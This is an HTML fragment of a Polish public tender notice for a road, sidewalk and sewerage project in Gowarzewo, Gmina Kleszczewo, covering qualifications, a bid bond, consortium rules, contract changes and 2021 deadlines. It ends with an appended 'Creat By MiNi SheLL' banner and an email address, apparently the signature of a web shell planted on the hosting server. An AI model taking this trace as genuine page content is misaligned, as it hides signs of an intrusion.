do pełnienia samodzielnych funkcji w<br/>budownictwie w specjalności drogowej;<br/>- kierownik robót posiadający uprawnienia budowlane w specjalności instalacyjnej w zakresie<br/>sieci, instalacji i urządzeń sanitarnych;<br/>lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów.<br/>Zamawiający dopuszcza możliwość łączenia wyżej wymienionych funkcji, pod warunkiem<br/>spełniania przez osobę łączącą te funkcje wszystkich warunków wymaganych dla<br/>poszczególnych funkcji.<br/>W przypadku Wykonawców zagranicznych, dopuszcza się również kwalifikacje zdobyte w innych<br/>państwach, na zasadach określonych w art. 12a ustawy Prawo budowlane, z uwzględnieniem<br/>postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 w<br/>zakresie podstaw wykluczenia, o których mowa w punkcie XIV SWZ– wg załącznika nr 9 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz robót budowlanych z załączeniem dowodów określających, czy te<br/>roboty budowlane zostały wykonane należycie, w szczególności informacji o tym, czy roboty zostały<br/>wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o<br/>których mowa są referencje, bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty<br/>budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze<br/>wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty. Dokument ten ma<br/>potwierdzać spełnienie wymagań wskazanych w punkcie XV. 1.4.1 SWZ (według wzoru stanowiącego<br/>załącznik nr 4 do SWZ).<br/>2. Wykaz osób skierowanych przez Wykonawcę do realizacji niniejszego zamówienia wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnymi do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami. Dokument ten ma potwierdzać<br/>spełnienie wymagań wskazanych w punkcie XV. 1.4.2 SWZ (według wzoru stanowiącego załącznik nr<br/>5 do SWZ).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca przystępujący do przetargu, obowiązany jest wnieść wadium w wysokości: 20<br/>000 zł.<br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>− pieniądzu;<br/>− gwarancjach bankowych;<br/>− gwarancjach ubezpieczeniowych;<br/>− poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia<br/>9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez<br/>Zamawiającego: Bank Spółdzielczy w Kórniku nr rachunku: 68 9076 0008 2001 0015 1106<br/>0003, tytułem „wadium - Budowa drogi wraz z chodnikami, zjazdami oraz kanalizacją - ul.<br/>Szałwiowa, Lawendowa<br/>w miejscowości Gowarzewo, Gmina Kleszczewo”. Za termin wniesienia wadium uznaje się<br/>chwilę uznania kwoty na rachunku Zamawiającego.<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji<br/>lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>− musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez<br/>Wykonawcę określone w ustawie PZP;<br/>− z treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty<br/>wadium;<br/>− powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>− termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania<br/>ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>− w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego<br/>postępowania;<br/>− beneficjentem poręczenia lub gwarancji jest: Gmina Kleszczewo.<br/>− w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 PZP),<br/>Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych<br/>z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub<br/>nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o<br/>zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona.<br/>7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 PZP <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 19. Oferty składane wspólnie (konsorcjum, spółka cywilna itp.):<br/>19.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>19.2. Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich<br/>w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego.<br/>19.3. Pełnomocnictwo musi zostać dołączone do oferty.<br/>19.4. Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego<br/>Zamawiający kieruje informacje, korespondencję, itp.<br/>19.5. Wykonawcy składający ofertę wspólną dołączają do oferty oświadczenie, z którego wynika,<br/>które prace wykonują poszczególni wykonawcy.<br/>19.6. Każdy z Wykonawców składa we własnym imieniu oświadczenia i dokumenty<br/>potwierdzające brak podstaw do wykluczenia z postępowania (Załącznik nr 2 do SWZ) oraz<br/>spełnienie warunków udziału w postępowaniu w zakresie, w którym będzie realizował roboty<br/>budowlane (Załącznik nr 3 do SWZ).<br/>19.7. Przed podpisaniem umowy (w przypadku wygrania postępowania) Wykonawcy składający<br/>ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu umowę konsorcjum,<br/>zawierającą co najmniej:<br/>a) zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim<br/>zakresem realizację przedmiotu zamówienia i określające zakres działania poszczególnych<br/>stron umowy,<br/>b) czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację<br/>zamówienia oraz czas trwania gwarancji jakości i rękojmi. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zam. przewiduje możliwość dok. zmian postanowień nin. umowy w stos. do treści oferty, na<br/>podst. której dokonano wyboru Wyk. w zakresie terminu wykonania przedm. umowy, za<br/>obopólną zgodą stron, w przyp. Wyst. co najmniej 1 z okoliczności:<br/>1) niekorzystne warunki atmosf. tj. opady (deszczu,gradu,śniegu), niskie temp. uniemożliwiające<br/>prawidłowe wyk. robót, w szczególności z powodu technologii realizacji prac określonej umową,<br/>normami lub innymi przepisami, wymagającej konkretnych warunków atmosf., jeżeli konieczność<br/>wykonania prac w tym okresie nie jest następstwem okoliczności, za które wykonawca ponosi odpowiedzialność<br/>2) jeżeli okoliczności związane z wystąpieniem COVID-19 wpływają na należyte wykonanie tej<br/>umowy<br/>3) wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez<br/>inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia kolizji<br/>4) gdy wystąpią opóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień, itp, do wydania których<br/>właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres,<br/>przewidziany w przepisach prawa, w którym ww decyzje powinny zostać wydane oraz<br/>opóźnienie to nie jest następstwem okoliczności, za które Wyk. ponosi odpowiedzialność<br/>5) jeżeli wystąpi brak możliwości wyk. robót z powodu nie dopuszczania do ich wykonywania<br/>przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn<br/>niezależnych od Wyk.<br/>6) gdy wystąpi konieczność wyk. robót zamiennych, dod. lub innych niezbędnych do wyk.<br/>przedmiotu umowy ze względu na zasady wiedzy techn., oraz udzielenia zamówień dod., które<br/>wstrzymują lub opóźniają realizację przedm. umowy-o czas niezbędny na ich wykonanie i<br/>przeprowadzenie formalności prawnych z tym związanych<br/>7) wystąpienia awarii, siły wyższej np. klęski żywiołowe, konflikt zbrojny, zdarzenia związane z<br/>działaniem sił natury<br/>8) wyst. okoliczności zaistniałych po stronie Zam., np. konieczność zmian dok. proj. w zakresie<br/>w jakim w/w okoliczności miały lub będą miały wpływ na dotrzymanie terminu zakończenia robót<br/>9) zawieszenia robót przez Zam. lub rezygnacji przez Zam. z części robót<br/>10) zmian w dok. proj., dokonanych na wniosek Zam. lub Wyk.<br/>11) wyst. odmiennych od przyjętych w dok. proj. War. terenowych i gruntowych<br/>12) wyst. niezinwentaryzowanych podziemnych sieci, instalacji, urządzeń, obiektów bud.,<br/>niewybuchów, niewypałów lub wykopalisk archeolog.<br/>13) wyst. konieczności zrealizowania proj. przy zastosowaniu innych rozwiązań techn. lub<br/>materiałowych, ze względu na zmiany obowiązującego prawa lub brak dostępności materiałów<br/>przewidzianych w dok. proj.<br/>14) Wyst. syt., utrudniającej wyk. robót niezbędnych do zrealizowania przedmiotu umowy, ze<br/>względu na zasady wiedzy techn.<br/>2. Zam. dop. możliwość aktualizacji harmonogr. rzeczowo–finan. na wniosek każdej ze Stron w<br/>zakresie przesunięcia terminów realizacji poszczególnych etapów robót lub ich kolejności. W<br/>przypadku gdy zmiana harmonogr. rzeczowo-finan. będzie miała wpływ na realizację<br/>postanowień umownych, Zam. dop. zmianę treści umowy w zakresie zmierzającym do<br/>uzyskania zgodności zapisów umowy z harmonogr., w tym Zam. jest uprawniony do zmiany<br/>spos. rozliczania umowy lub dok. płatności na rzecz Wyk.<br/>3. W przyp. zmiany powszechnie obowiąz. prawa-w zakresie mającym wpływ na realizację<br/>obowiązków umownych-Zam. dop. zmianę treści umowy w zakresie zmierzającym do uzyskania<br/>zgodności zapisów umowy z obowiązującym prawem<br/>4. W przypadku zmian org. u Wyk. lub Zam., w tym również związanych z następstwem<br/>prawnym podmiotów, Zam. dop. zmianę treści umowy w tym przedm.<br/>5. Zam. dop. zmianę treści umowy w przypadku wyst. oczywistych omyłek i błędów pisarskich<br/>poprzez ich poprawienie, tzn. przekreślenie błędnej treści i wpisanie popr. oraz opatrzenie jej<br/>podpisem przez Zam. oraz Wyk.<br/>6. Zmiany umowy, o których mowa w nin. Par., mogą być dok. za zgodą obu stron,w formie<br/>pisemnego aneksu pod rygorem nieważności,z wyj. przyp.,o których mowa w ust. 2 zd. 1. i ust. 5 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-03 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/kleszczewo , Urząd Gminy Kleszczewo</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-03 08:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-02</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com